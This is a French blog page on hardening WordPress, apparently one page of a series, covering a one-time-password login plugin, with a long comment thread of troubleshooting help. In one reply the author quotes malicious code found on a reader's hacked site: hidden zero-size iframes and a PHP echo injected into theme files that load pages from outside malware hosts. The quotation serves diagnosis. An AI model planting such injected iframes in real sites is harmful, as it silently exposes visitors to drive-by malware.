Protéger votre WordPress du grand méchant loup

WordPress mot de passe à usage unique One-Time Password

WordPress mot de passe à usage unique One-Time Password

Pour accroître toujours plus la sécurité de votre WordPress (là on commence quand même à friser la paranoïa), vous allez pouvoir, par l’intermédiaire d’un plugin, définir des mots de passe à usage unique. Il s’agit cette fois du plugin One-Time Password que Marcel Bokhorst a initialement développé pour ses propres besoins. Ce plugin est par ailleurs inscrit au concours WordPress Plugin Competition Blog !

Vous voyez la chaîne de caractères otp-md5 49 c83u0gl8 présente sous le champ Password (ou Mot de passe) ? Et bien cette chaîne dépend directement du Username (ou Nom d’utilisateur) qui sera renseigné dans le premier champ. D’ailleurs cette chaîne de caractères n’apparaît, en toute logique, que lorsque le Nom d’utilisateur est renseigné et que vous passez à la saisie du Mot de passe (c’est beau l’ajax!). La première partie de la chaîne de caractères otp-md5 signifie simplement que cette dernière se rapporte au plugin One-Time Password et que c’est l’algorithme de hashage MD5 qui est est utilisé. La seconde partie 49 est un numéro auquel correspond le mot de passe à usage unique : cela est déterminé dans le tableau suivant qui est accessible depuis le panneau d’administration…

WordPress mot de passe à usage unique One-Time Password

La troisième partie de la chaîne de caractères c83u0gl8 correspond au seed. A voir la capture d’écran ci-dessus, on pourrait croire que le seed est directement lié au Nom d’utilisateur, ce qui n’est pas tout à fait vrai. Un utilisateur peut avoir plusieurs seed, d’où cette distinction. On peut donc en déduire qu’un seed correspond à une liste de mots de passe pour un utilisateur, mais que cet utilisateur peut disposer de plusieurs listes de mots de passe. Si tel est le cas, au moment de saisir le mot de passe, il faudra que l’utilisateur vérifie les deux dernières parties de la chaîne de caractères : 49 c83u0gl8. Il devra ainsi entrer le mot de passe n°49 du seed (de la liste) c83u0gl8.

Informations complémentaires :
Ce plugin a besoin du nouveau filtre d’authentification et requiert donc au minimum WordPress 2.8 ! Il est testé fonctionnel sur Mozilla Firefox 3.0/3.5 et Internet Explorer 8. D’autres navigateurs sont bien sûr en mesure de supporter le plugin mais il faut tout de même faire attention car OTP utilise la librairie javascript jQuery. En plus de cette librairie javascript, ODT utilise également : le script PHP OTP développé par Tomas Mrozek, le plugin jqPrint pour jQuery, le plugin URL Utils développé par Ben Alman pour jQuery et le plugin SimpleModal développé par Eric Martin pour jQuery.

Avis personnel :
OTP n’est selon moi d’aucune utilité sauf peut être dans des cas extrêmement particuliers et encore… Je ne vois aucun cas de figure dans lequel OTP pourrait avoir une quelconque utilité mais… admettons ! Je n’ai même pas eu le courage de mettre en place cette solution pour la tester tellement elle m’apparaît comme farfelue. Fort heureusement il ne doit pas avoir beaucoup de blogueurs qui utilisent ça sur leur WordPress : peut être les paranoïaques et les schizophrènes tout au plus.

60 gentils commentaires !
Pagination...

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

al

Encore un bon gros pavé pleins d’astuces signé NightAngel pour WP, bien joué

al.

Commentaire n°31576 publié le 28 novembre 2008 à 16:52.

De toute façon c’est encore un bon billet, et très instrutif, pour ceux qui utilise WP ou qui désire l’utiliser. pour les autres je ne sais pas. Perso, j’ai mon fournisseur qui s’occupe de tout d’une main de maître. J’ai toute confiance donc aucun soucis ^^

Ah … WP c’est bien quand même

Commentaire n°31577 publié le 28 novembre 2008 à 17:04.

L’avant dernier est le seul que je peut faire de suite :twisted:

L’image est très sympa !!
Conservé l’effet pupille > très très bien réussis!

Commentaire n°31585 publié le 29 novembre 2008 à 00:56.

Très bon billet qui me sera sûrement utile.

Commentaire n°31597 publié le 29 novembre 2008 à 16:59.

Je suis content de voir que ce billet intéresse quelques personnes Néanmoins je reconnais avoir un peu baclé certains passages comme la sécurisation de l’identification par .htaccess et .htpasswd mais je n’étais pas sûr que ce billet intéresserait beaucoup de monde alors je ne voulais pas broder pour rien Si l’article plaît alors je procéderai à une actualisation de ce dernier lors de la sortie de WordPress 2.7 (certaines choses vont un peu changer) et j’en profiterai pour aborder une manière de lutter contre le hotlinking. Une version .pdf est également envisageable/envisagée. Merci pour vos commentaires en tous cas et je suis à votre disposition si vous rencontrez quelque problème que ce soit avec votre installation WordPress

Commentaire n°31598 publié le 29 novembre 2008 à 17:07.
Sky

Oups j’ai un peu de retard =).

Je suis en pleine révisions pour mes exams, je lirais attentivement ton article dès que possible.

Merci beaucoup pour ton aide !

Commentaire n°31626 publié le 1 décembre 2008 à 13:05.
Vilay

Salut,
Avec wordpress 2.7, il y a une quatrième clé qui s’est rajoutée mais mon problème principal, c’est que je ne trouve pas de fichier wp-config. Faut dire que je n’y connais pas grand chose.
As-tu une idée de ce que je dois faire?(a part me bourrer la gueule).

Commentaire n°31901 publié le 14 décembre 2008 à 17:43.

@Sky : Bonne lecture ;)

@Vilay : Le fichier wp-config.php est à la racine de ton blog. Je pense que tu cherches ce fichier afin d’y ajouter la quatrième clé de cryptage qui a été introduite dans la version 2.7 de WordPress Je t’ai envoyé un mail si jamais ^^

Commentaire n°31903 publié le 14 décembre 2008 à 18:23.

J’ajouterai quelques techniques malines : http://blogmotion.fr/internet/[...]onfig-3847 ;)

Commentaire n°36046 publié le 20 août 2009 à 00:24.

La méthode la plus simple et propre reste de le faire via l’admin, méthode 3 donc.

Pour la version Wordpress 2.8 c’est par ici : http://blogmotion.fr/internet/[...]press-3811

Commentaire n°36048 publié le 20 août 2009 à 00:26.

@Mr Xhark : Merci pour le lien, pas mal la technique de masquer la présence de wp-config.php en plus d’interdire son accès. Je l’avais testé et je n’étais pas arrivé à la mettre en oeuvre sur ce blog. Bon je n’y avais pas passé énormément de temps ou alors un problème dans la configuration de mon serveur Apache : I don’t know! A titre indicatif, « interdire totalement l’accès (erreur 403) » est traité en page 11 (protéger le fichier wp-config.php) et « masquez le contenu de vos répertoires » est traité en page 9 (empêcher le listage des répertoires). Quoiqu’il en soit c’est une excellente initiative de réunir le maximum de documentation autour de ce sujet : Merci!

Commentaire n°36050 publié le 20 août 2009 à 00:56.

Merci pour l’info

Où puis-je trouver ce pack d’émoticons très sympa?

Commentaire n°36195 publié le 25 août 2009 à 15:23.

@Fab1 : Voici le lien qui te permettra de télécharger mon pack de smilies/émoticônes. Merci pour ton commentaire en tous cas

Commentaire n°36196 publié le 25 août 2009 à 15:46.

Merci beaucoup! C’est super sympa ;)

@ p’luche…

Commentaire n°36198 publié le 25 août 2009 à 17:52.
Sandrine

Bonjour,

Bon billet… Intéressant avec des conseils fort utiles ! mais je n’ai pas vu la réponse à la question que je me pose… ;-(
Avec WordPress j’ai créé des pages organisées hiérarchiquement (niveau 1, 2, etc.)… les niveaux 1 correspondent à mes menus principaux et je voudrais justement restreindre l’accès au contenu du menu Espace Client… Dans le .htaccess j’ai renseigné où se trouvait mon .htpassword
AuthUserFile /home/user/html/espaceclient/.htpasswd
Mais comment renseigner le répertoire concerné qui correspond à cette URL : http://www.mondomaine.com/espa[...]ce-client/ ?
car bien sûr tant que ce n’est pas renseigné cela ne peut pas marcher ;-)
Merci pour vos lumières !

Commentaire n°36219 publié le 26 août 2009 à 17:11.

@Sandrine : Merci pour le commentaire et on va peut être se tutoyer Si j’ai bien compris, « espace-client » est une page de niveau hiérarchique 1 qui englobe plusieurs sous-pages de niveaux hiérarchiques inférieurs ? Si tel est le cas alors /espace-client/ est un lien symbolique (permalien) et non un répertoire réel (présent sur le FTP). Il n’est de ce fait pas possible d’utiliser dans ce cas les méthodes des .htaccess et .htpasswd. En fait tu veux mettre un mot de passe sur ta page « espace-client » ? Mais la page « espace-client » ainsi que ses sous-pages ne sont-elles pas listées dans ta « sidebar » ? Tu comptais donc mettre un mot de passe sur la page « espace-client » ainsi que sur toutes les pages d’un niveau hiérarchique inférieur ?

Commentaire n°36222 publié le 26 août 2009 à 17:26.
Sandrine

On est bien d’accord /espace-client/ n’est pas un répertoire physique présent d’où le problème ;-)
Espace Client est listé dans les menus avec les sous-pages. Voir : http://www.webperformancetools[...].com/
« Tu comptais donc mettre un mot de passe sur la page « espace-client » ainsi que sur toutes les pages d’un niveau hiérarchique inférieur ? » -> Eh oui ! Tu as tout compris.

Commentaire n°36223 publié le 26 août 2009 à 17:43.

@Sandrine : OK je cerne un peu mieux le « problème » désormais Es-tu obligée de passer par cette étape « d’identification par mot de passe » pour afficher l’espace client ? Il n’est pas envisageable par exemple de rentrer l’ensemble des clients dans la base de données ? A partir de cet instant, quand un client sera connecté à son compte sur le blog, le menu « espace client » s’affichera… En fait je veux savoir s’il est possible d’utiliser ou non le système de permissions intégré à WordPress ou si un mot de passe global (ou spécifique à chaque page) est obligatoire ?

Ce que je n’ai pas compris, c’est pourquoi lors de l’édition de la page, tu ne vas pas en haut à droite dans la boîte « Publier » et que tu ne choisis pas « Visibilité : Protégé par mot de passe » ?

Commentaire n°36224 publié le 26 août 2009 à 17:56.
Sandrine

1 – Je voulais utiliser .htaccess/.htpassword car il paraît que la sécurité WordPress est moyenne… voire bof…
2 – Je veux en fait créer un login/mot de passe global pour CHAQUE client (tout le monde ne peut pas être client) valable pour la rubrique Espace Client (donc les pages sous-jacentes)… et créer un login/mot de passe générique pour les évaluateurs.
3 – « Visibilité : Protégé par un mot de passe »… je n’ai pas affiné de ce côté mais j’ai l’impression que cela ne répond pas à mon besoin…
En tout cas merci pour ton aide… car j’en suis à mes « débuts » avec WordPress et je me pose pas mal de question… et dans la communauté (forum) je ne trouve pas forcément les réponses à mes questions… c’est vrai que dans mon cas j’utilise WordPress dans un contexte au-delà du blog

Commentaire n°36226 publié le 26 août 2009 à 18:14.

@Sandrine : Le plugin Global Post Password te permet de mettre un mot de passe global sur tes pages, ça évite d’éditer toutes les pages les unes après les autres. Regarde aussi du côté du plugin Show User Level Content pourrait être une alternative « simple ».

Sinon tu mets toutes tes pages relatives à l’espace client, en « Visibilité:privé » et ainsi, seuls les utilisateurs qui disposent d’un compte sur le blog (et qui sont connectés) pourront consulter ces « pages privées ». Pour afficher la liste de tes pages privées uniquement aux utilisateurs enregistrés et connectés, tu utilises ce bout de code dans le fichier de thème approprié (disons header.php par exemple) :

View Code PHP
1
2
3
4
5
6
7
8

<ul>
<?php
wp_list_pages('depth=1&title_li=0&sort_column=menu_order');
if(current_user_can('read_private_pages')) :
?>
<li><a href="<?php echo get_permalink(10); ? rel="nofollow">">For Authors only</a></li>
<?php endif; ?>
</ul>
Commentaire n°36227 publié le 26 août 2009 à 18:33.
Sandrine

Merci 1.000 fois !
Je regarde et je te tiens informé des résultats.

Commentaire n°36228 publié le 26 août 2009 à 18:46.
Sandrine

Bonjour,

Le bout de code contient plusieurs erreurs de syntaxe que je n’arrive pas à corriger… ;-(

Merci

Commentaire n°36673 publié le 4 septembre 2009 à 13:41.

@Sandrine : Oups, j’ai un peu foiré le code au niveau de la ligne 6. Voici le code rectifié :

View Code PHP
1
2
3
4
5
6
7
8

<ul>
<?php
wp_list_pages('depth=1&title_li=0&sort_column=menu_order');
if(current_user_can('read_private_pages')) :
?>
<li><a href="<?php echo get_permalink(10); ?>" rel="nofollow">For Authors only</a></li>
<?php endif; ?>
</ul>

Le 10 représente l’identifiant (ID) de la page ou du billet qui doit être s’afficher lorsque le visiteur va cliquer sur « For Authors Only ». Cela ne s’affichera qu’aux utilisateurs enregistrés et connectés, cette condition est posée à la ligne 4. Tu trouveras plus d’informations sur la fonction get_permalink() sur cette page.

PS : Mon bout de code était bon mais c’est WordPress qui avait foutu le bordel avec son formatage à la noix

Commentaire n°36674 publié le 4 septembre 2009 à 13:51.
Sandrine

cette ligne présente tjs des erreurs
? inattendu

Commentaire n°36676 publié le 4 septembre 2009 à 14:12.

@Sandrine : Tu as mis le bout de code dans quel fichier ? Je l’ai testé dans sidebar.php et je n’ai pas eu de problème… Peux-tu me filer tout ton code par mail : webmaster@nightangel.fr Tankiou!

Commentaire n°36677 publié le 4 septembre 2009 à 14:20.
Sandrine

je l’ai mis dans header
mais attends je vais tester dans sidebar

Commentaire n°36678 publié le 4 septembre 2009 à 14:23.

@Sandrine : Il n’y a pas de raison que le bout de code ne fonctionne pas dans header.php et pour être sûr je viens de tester. Je pensais plutôt à un problème d’intégration du bout de code… Le code ne t’affiche strictement rien ?

Commentaire n°36679 publié le 4 septembre 2009 à 14:27.
Sandrine

Ca a l’air OK. Je t’envoie un email, plus simple, et merci…

Commentaire n°36680 publié le 4 septembre 2009 à 14:44.

Bonjour,
Merci pour ce billet fort instructif. Concernant la sécurité du blog (2.8.4).
Ou doit-on installer le plugin?

Commentaire n°36708 publié le 5 septembre 2009 à 18:53.
Sandrine

Merci Paul – NightAngel pour ton aide.
Eureka !!! Voir : http://www.kapitec.com/blog/?p[...]=129 pour la solution qui peut certainement intéresser d’autres personnes ;-)

Commentaire n°36729 publié le 6 septembre 2009 à 16:06.
Vince

Excellent dossier ! Je connaissais une partie de ces astuces, mais j’avoue qu’il en reste quelques unes à mettre en place pour avoir un WP en béton armé.

Par rapport à l’idée de renommer wp-admin pour changer l’adresse par défaut de l’interface d’admin, tu as des retours sur tes « expérimentations » dans le domaine ?

Commentaire n°37034 publié le 16 septembre 2009 à 22:27.

@Bruno M : Il n’y a pas un plugin en particulier. Ce billet renferme un ensemble de solutions (dont des plugins) pour accroître la sécurité de WordPress. Merci pour ton commentaire

@Sandrine : Mais de rien, content d’avoir pu te rendre service et merci pour ton lien ;)

@Vince : J’ai pas mal avancé quant au déplacement du répertoire wp-admin cependant je ne suis pas convaincu par les modifications apportées bien qu’elles soient fonctionnelles. Pour l’heure le résultat le plus probant provient de la méthode décrite ici (en anglais). Le principal problème, et pas des moindres, étant que le répertoire wp-admin contient une partie de ce que l’on pourrait appeler le « core » de WordPress. Partant de là, toutes les modifications envisagées pour « déplacer » wp-admin, pourraient poser des problèmes à l’avenir. Je pense notamment lors de profondes mises à jour. Merci pour le com

Commentaire n°37036 publié le 17 septembre 2009 à 01:21.

Article vraiment très intéressant. Avec toutes ces astuces, je sais comment m’occuper ce soir

Commentaire n°37049 publié le 17 septembre 2009 à 15:05.

Bonjour, déja merci pour ce super récapitulatif des méthodes permettant de protéger WordPress. Très instructif et très formateur.
Pour ce qui est du wp-admin, personnellement j’ai juste renommé le dossier (en « modifier » par exemple, « login » et « admin » étant trop facile à trouver) et j’ai éditer tous les fichiers de WordPress pour remplacer « wp-admin » par « modifier » (avec Dream’ 2 minutes montre en main), ainsi que dans la base de donnée via phpmyadmin. Comme ça le pirate mettra 1 poil plus de temps à trouver la page de connexion au PA.

voilà, j’espère que aidera quelqu’un

Commentaire n°37087 publié le 18 septembre 2009 à 10:59.

@Jack NUMBER : Je ne doute pas le moins du monde de la méthode que tu utilises, cependant je ne pense pas qu’elle puisse être appliquée par le plus grand nombre. Il n’y a rien de compliqué dans ta démarche mais cela risque de poser d’importants problèmes lors de futures mises à jours. Personnellement je ne préfère pas la conseiller au plus grand nombre, mais peut être à des personnes qui font des modifications en « connaissance de cause » Modifier des fichiers en dehors du répertoire wp-content n’est jamais très bon à terme Merci pour ton commentaire

Commentaire n°37105 publié le 18 septembre 2009 à 16:32.

je suis tout à fait d’accord avec toi sur les mise à jour et les problèmes possibles (plug-in, requêtes…).
c’est en effet une méthode assez « radicale » qui demande certaines précautions d’usage, surtout pour l’évolution du blog.
à quand un plug-in « Total Security » ?

Commentaire n°37120 publié le 19 septembre 2009 à 01:39.
joomlaxp

Suite à ce changement de préfixe j’ai eu une erreur de connection.

« Vous n’avez pas les droits suffisants pour accéder à cette page »

Si cela arrive à quelqu’un j’ai trouvé la solution ici
http://beconfused.com/2007/08/[...]wordpress/

J’ai appliqué la méthode donnée et tout est rentré en ordre

Commentaire n°37270 publié le 23 septembre 2009 à 12:22.
léo

Bonjour,

Merci pour ces conseils mais j’ai un problème…

J’ai ajouté ce code dans le fichier function.php

et depuis j’ai cette erreur :

Warning: Cannot modify header information – headers already sent by (output started at /homez.307/motocros/www/wp-content/themes/mxa/functions.php:13) in /homez.307/motocros/www/wp-includes/pluggable.php on line 865

Impossible d’accéder à l’interface d’administration…

Merci de votre aide

Commentaire n°37366 publié le 25 septembre 2009 à 18:29.
Andy

Merci!

Commentaire n°37814 publié le 8 octobre 2009 à 00:40.

Merci pour les liens! Je suis en train de réfléchir pour refondre mon site et mon blog sous wordpress… et là, ça va commencer à me faire peur. Je vais peut-être attendre un peu…

Commentaire n°38693 publié le 31 octobre 2009 à 17:40.
pocpoc

Bonjour,
Je me joins aux commentaires précédants pour remercier NightAngel de la foultitude de conseils que meme des nazouilles comme moi pouvons appliquer…
J’ai une question par rapport au passage en https:// sur la page de connexion.

J’ai suivi pas a pas les indications de la p.3: j’ai copié le code donné et l’ai collé dans un .txt que j’ai mis dans le répertoire wp-content/plugins.

Ma premiere observation est que le plugin n’apparait pas dans la liste des plugins paramétrables via l’interface administrateur de WP.

Ma deuxieme question me dérange plus: suite à cette manip, mon site entier est passé en https, ce qui fait que la visite du site nécessite d’accepter un certificat de sécurité temporaire patati patata… ce qui n’est pas du plus accessible, en terme de facilité d’acces pour les visiteurs…
Est il possible de modifier quelquechose quelque part?
J’ai commencé par simplement effacer le .txt du répertoire plugin, ce qui n’a rien changé du tout…

Merci pour tout!

Commentaire n°38887 publié le 9 novembre 2009 à 09:46.

@léo : Désolé pour ma réponse tardive mais tu as du laisser des lignes vides dans ton fichier functions.php, d’où cette erreur. Généralement il s’agit d’une ligne vide au début et/ou à la fin du fichier je pense. Tu peux m’envoyer le fichier par mail si tu veux : webmaster@nightangel.fr.

@pocpoc : Je suis désolé mais pour l’instant je n’ai plus de serveur qui supporte le https:// et il me sera donc difficile de te répondre… Je viens de lire le plugin que je cite dans le billet et des modifications ont été apportées à WordPress entre temps. Je te conseille d’essayer ce plugin qui est beaucoup plus d’actualité : HTTPS for WordPress. Je sais qu’il est compatible avec la version 2.5 mais au premier abord je ne vois pas pourquoi il ne marcherait pas avec la 2.8. Désolé de ne pouvoir mieux te renseigner…

Commentaire n°38905 publié le 10 novembre 2009 à 03:58.
abort

MERCI pour cet excellent tutoriel, très clair et très complet. Il m’a été très utile.

Commentaire n°39519 publié le 4 décembre 2009 à 16:49.
caro

merci pour toutes vos astuces et vos conseils ! Parfois, je trouve cela compliqué, car je ne suis pas informaticienne et le php c’est une langue étrangère pour moi ! j’en suis encore au bon vieux dhtml !
et encore !
j’ai compris comment cela fonctionne ces langages comme le php, les flux rss et autres joyeusetés, mais franchement j’ai beaucoup de mal à appliquer.
Petite question : mon site à été piraté. Via google, j’ai suivi les conseils mais maintenant, je crains toujours une nouvelle attaque.
Il m’a semblé que ce hacking est arrivé alors que je venais de changer de theme wordpress. Est-ce qu’un theme wordpress gratuit peut-être vérolé ? Comment le reconnaître ?
Merci
Caroline

Commentaire n°40440 publié le 3 janvier 2010 à 12:15.
dd

Bonjour merci pour ce dossier, malheureusement la partie qui m’intéresse n’existe plus et cela fait un moment qu’il est notifié :
« Il n’est pas évident, mais pas impossible non plus, de manipuler le répertoire wp-admin. En effet cela peut poser des problèmes à plusieurs niveaux, je suis actuellement en train de tester une méthode et de vérifier son bon fonctionnement. Dès qu’une solution accessible est trouvée, je viens éditer cette page. Merci pour votre compréhension ! »
Alors j’en conclu que tu n’as pas réussis à le faire ?
Comment déplacer et renommer wp-admin ?
Merci

Commentaire n°41298 publié le 31 janvier 2010 à 16:41.

@dd : Pour l’instant je ne suis toujours pas très satisfait de mes essais et c’est pour cette raison que je n’ai rien publié. Ce n’est pas impossible mais je me refuse catégoriquement de toucher au « core » de WordPress, je veux qu’il reste pleinement possible de le mettre à jour sans problème, etc… Pour l’instant la solution la plus concluante se trouve ici. Je vais continuer mes essais dès que je trouve un peu de temps. Voilà

Commentaire n°41303 publié le 31 janvier 2010 à 21:02.
dd

Bonsoir, super merci infiniment pour ce lien, je cherchais comment résoudre ce problème depuis un moment ;)
Bravo aussi pour ton site, très intéressant ;)
Finalement tu peux peut-être me renseigner, car mon problème est identique à celui décrit ici : http://forum.webrankinfo.com/c[...]l#p1136079
La seule solution est donc de déplacer le dossier wp-admin alors ? Mais donc d’après ce que tu dis si on fait ça on touche au core de wordpress ? C’est donc pour ça que d’après le lien que tu m’as donné il est préférable de faire une redirection de l’accès à la partie admin de wordpress, est-ce bien ça, dis-moi si j’ai bien tout compris ? ;)

Commentaire n°41326 publié le 1 février 2010 à 18:27.
dd

Bonsoir, ce script est-il valable ?
http://www.brunovalentin.com/s[...]wordpress/
Si oui comment le mettre en place ?

Commentaire n°41327 publié le 1 février 2010 à 18:49.

Bonjour,

Alors toujours un plaisir de lire les conseils dispensés ici. Cependant voilà mon soucis. Je pensais avoir réglé mon problème de hacking sauvage sur mon wordpress et voilà que cela recommence. Je ne suis pas la seule, car pour mon travail, nous administrons un site wordpress qui est une radio podcast pédagogique. Que ce soit mon wordpress ou un autre, il semble que le hacking sauvage sévit. Nous recevons des commentaires bizzares avec des adresses bizzares et comme par hasard, même si vous les supprimez définitivement ou cochez indésirables, à ce moment là, problème. Du coup google, annonce votre site comme étant malveillant ! J’ai beau effectuer toutes les démarches pour y remédier c’est une vraie galère ! please help me ! merci beaucoup !

Commentaire n°41349 publié le 2 février 2010 à 14:09.

@dd : Cette méthode est plutôt intéressante cependant la première partie sous-entend que vous ayaez une adresse ip fixe car seule votre connexion pourra accéder au répertoire « wp-admin ». Le problème étant que, comme la plupart des internautes, vous devez avoir une adresse ip dynamique allouée par votre fournisseur d’accès. En d’autres termes, votre adresse ip ne doit pas être la même aujourd’hui que dans 3 jours par exemple.

@caro : Il me faudrait davantage de précisions, vous pouvez me joindre par mail ( webmaster@nightangel.fr ), MSN ( fatal1ty@wanadoo.fr ) ou skype ( nightangel46 ). Par rapport aux commentaires, utilisez-vous le plugin (extension) « akismet » ? Il y a de toutes façons d’autres problèmes si je me base sur le site openbooks.fr En effet il y a des bouts de codes étranges tels que :

View Code PHP
1

echo '<div style="display:none">eddsfsdfsd<iframe width=2 height=2 src="http://4analytics.ws/in.cgi?8"></iframe> </div> ';

ou encore :

View Code HTML4STRICT
1
2
3
4
5

<iframe iccmc='nU2hKVfk' src='http://4analytics.ws/in.cgi?8 ' wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<b><a href="http://www.zcinema.ru"><font color="#808080">�������
�����</font></a></b><iframe src='http://pumpidss.com/index.php?s=3ad9361a36c374be1b3dcd9f6384d8e2' style='display: none;'></iframe><iframe iccmc='nU2fk' src='http://281B.com/in.cgi?8 ' wcxjb='QMXjE' width='0' height='0' style='display:none'></iframe>echo '<div style="display:none">eddsfsdfsd<iframe width=2 height=2 src="http://281B.com/in.cgi?8"></iframe>

Ce sont probablement les fichiers de thème « header.php » et « footer.php » qui sont impactés, voire « functions.php ». Merci pour votre commentaire et vous savez où me joindre si nécessaire.

Commentaire n°41350 publié le 2 février 2010 à 15:29.
dd

Bonsoir, voulant retourner sur le lien donné dans le post plus haut, je ne peux accéder, Kapersky me bloque cette page avec un gros avertissement rouge, c’est étonnant le lien semble infecté par un « Trojan-Clicker.JS.Agent.ma » selon Kapersky 2010 ?

Commentaire n°41600 publié le 13 février 2010 à 15:02.

merci pour cet article qui m’a permis d’améliorer mes connaissances en Wp !

Commentaire n°41651 publié le 15 février 2010 à 05:42.

Superbe tutoriel, franchement tu es une bombe man, la sécurité à ce niveau tu es top ! Continue…

Commentaire n°42130 publié le 3 mars 2010 à 12:21.

Laisser un commentaire
Laisser un commentaire

  Si vous disposez d'un compte, vous pouvez vous connecter.


  Entrez l'adresse de votre site (ou blog). Ce champ est facultatif.